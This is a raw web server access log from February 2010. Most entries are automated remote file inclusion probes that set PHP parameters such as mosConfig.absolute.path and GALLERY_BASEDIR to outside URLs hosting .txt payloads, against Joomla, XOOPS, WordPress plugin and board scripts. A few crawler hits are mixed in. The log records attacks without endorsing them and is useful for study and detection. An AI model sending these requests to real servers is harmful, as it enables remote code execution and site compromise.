124.136.23.172 - - [28/Feb/2010:19:00:03 -0800] "GET /logs/access_090831.log//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:19:03:50 -0800] "GET /logs/access_100125.log%20%20//bbs//////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:04:28 -0800] "GET /mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:04:29 -0800] "GET /logs/access_091012.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:04:30 -0800] "GET /logs//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:05:54 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:05:54 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:05:54 -0800] "GET /logs/access_090810.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.6.14 - - [28/Feb/2010:19:06:15 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "galf.org"
216.104.40.170 - - [28/Feb/2010:19:06:37 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:06:37 -0800] "GET /logs/access_090810.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:06:37 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:07:02 -0800] "GET /logs//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:07:02 -0800] "GET /mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:07:08 -0800] "GET /logs/access_091012.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:08:44 -0800] "GET /logs/access_091228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:08:44 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:19:08:44 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:19:08:44 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:19:09:11 -0800] "GET /logs/access_091228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:09:11 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:19:09:11 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:19:09:11 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.43.212.56 - - [28/Feb/2010:19:09:39 -0800] "GET /logs/access.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:09:39 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:09:40 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:10:16 -0800] "GET /logs/access_091116.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:10:16 -0800] "GET /logs/access_091130.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:10:39 -0800] "GET /logs/access.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:10:39 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:10:39 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:10:42 -0800] "GET /logs/access_100201.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:10:42 -0800] "GET /logs/access_091214.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:10:44 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:10:44 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:10:44 -0800] "GET /logs/access.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:10:49 -0800] "GET /logs/access_090928.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:10:50 -0800] "GET /logs/access_100222.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:10:50 -0800] "GET /logs/access_100104.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.46 - - [28/Feb/2010:19:11:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:19:11:21 -0800] "GET /logs/access_091123.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:11:31 -0800] "GET /mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:11:32 -0800] "GET /logs/access_091012.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:11:32 -0800] "GET /logs//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:11:53 -0800] "GET /logs/access_090907.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:12:16 -0800] "GET /logs/access_100208.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:12:16 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:12:16 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:12:21 -0800] "GET /logs/access_100201.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:13:38 -0800] "GET /logs/access_091012.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:13:38 -0800] "GET /mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:13:42 -0800] "GET /logs//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:14:11 -0800] "GET /logs/access_090907.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:14:13 -0800] "GET /logs/access_100118.log/////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:14:13 -0800] "GET ////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 1054 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:14:16 -0800] "GET /logs/////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 4811 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:14:17 -0800] "GET ////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 1054 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:14:17 -0800] "GET /logs/////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 4811 "-" "Mozilla/5.0" "www.galf.org"
207.46.199.46 - - [28/Feb/2010:19:15:15 -0800] "GET /labia/?S=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:15:24 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:15:24 -0800] "GET /logs/access_100208.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:15:24 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:15:30 -0800] "GET /logs/access_100201.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:15:48 -0800] "GET ////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 1054 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:15:49 -0800] "GET /logs/access_100118.log/////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:15:50 -0800] "GET /logs/////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 4811 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:16:45 -0800] "GET /logs/access_100118.log%20%20/////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:18:16 -0800] "GET /logs//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:18:16 -0800] "GET /logs/access_091012.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:18:45 -0800] "GET /logs/access_090907.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:23:01 -0800] "GET /logs/access_100118.log%20%20/////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:23:04 -0800] "GET /logs/access_100118.log%20%20/////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:12 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:12 -0800] "GET /logs/access_091026.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:12 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:23:27 -0800] "GET /mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:23:27 -0800] "GET /logs//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:23:29 -0800] "GET /logs/access_091012.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:37 -0800] "GET /logs/access.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:57 -0800] "GET /logs/access_091026.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:57 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:57 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:57 -0800] "GET /logs/access_091026.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:58 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:23:58 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:24:07 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:24:08 -0800] "GET /logs/access_091026.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:24:08 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:24:11 -0800] "GET /logs/access.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:24:18 -0800] "GET /logs/access.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:24:21 -0800] "GET /logs/access.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.201.180.130 - - [28/Feb/2010:19:26:56 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hlpp.org/hlpp/uploaded/c.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
200.201.180.130 - - [28/Feb/2010:19:26:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hlpp.org/hlpp/uploaded/c.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
200.201.180.130 - - [28/Feb/2010:19:26:58 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hlpp.org/hlpp/uploaded/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
200.201.180.130 - - [28/Feb/2010:19:26:59 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hlpp.org/hlpp/uploaded/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:28:04 -0800] "GET /logs/access.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:28:05 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:28:08 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:28:22 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:28:23 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:28:23 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:28:24 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:28:24 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:28:25 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:28:49 -0800] "GET /logs/access_091214.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:28:50 -0800] "GET /logs/access_091130.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:28:50 -0800] "GET /logs/access_091116.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:12 -0800] "GET /logs/access_100104.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:14 -0800] "GET /logs/access_091123.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:14 -0800] "GET /logs/access_100201.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:14 -0800] "GET /logs/access_100222.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:14 -0800] "GET /logs/access_090928.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:21 -0800] "GET /logs/access_100118.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:21 -0800] "GET /logs/access_091026.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:21 -0800] "GET /logs/access_090831.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:21 -0800] "GET /logs/access_090817.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:29 -0800] "GET /logs/access_091102.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.114.35 - - [28/Feb/2010:19:29:38 -0800] "GET /logs/access_090907.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:19:29:38 -0800] "GET /logs/access_090921.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:19:31:15 -0800] "GET /logs/access_091130.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:19:31:20 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:31:40 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:31:48 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
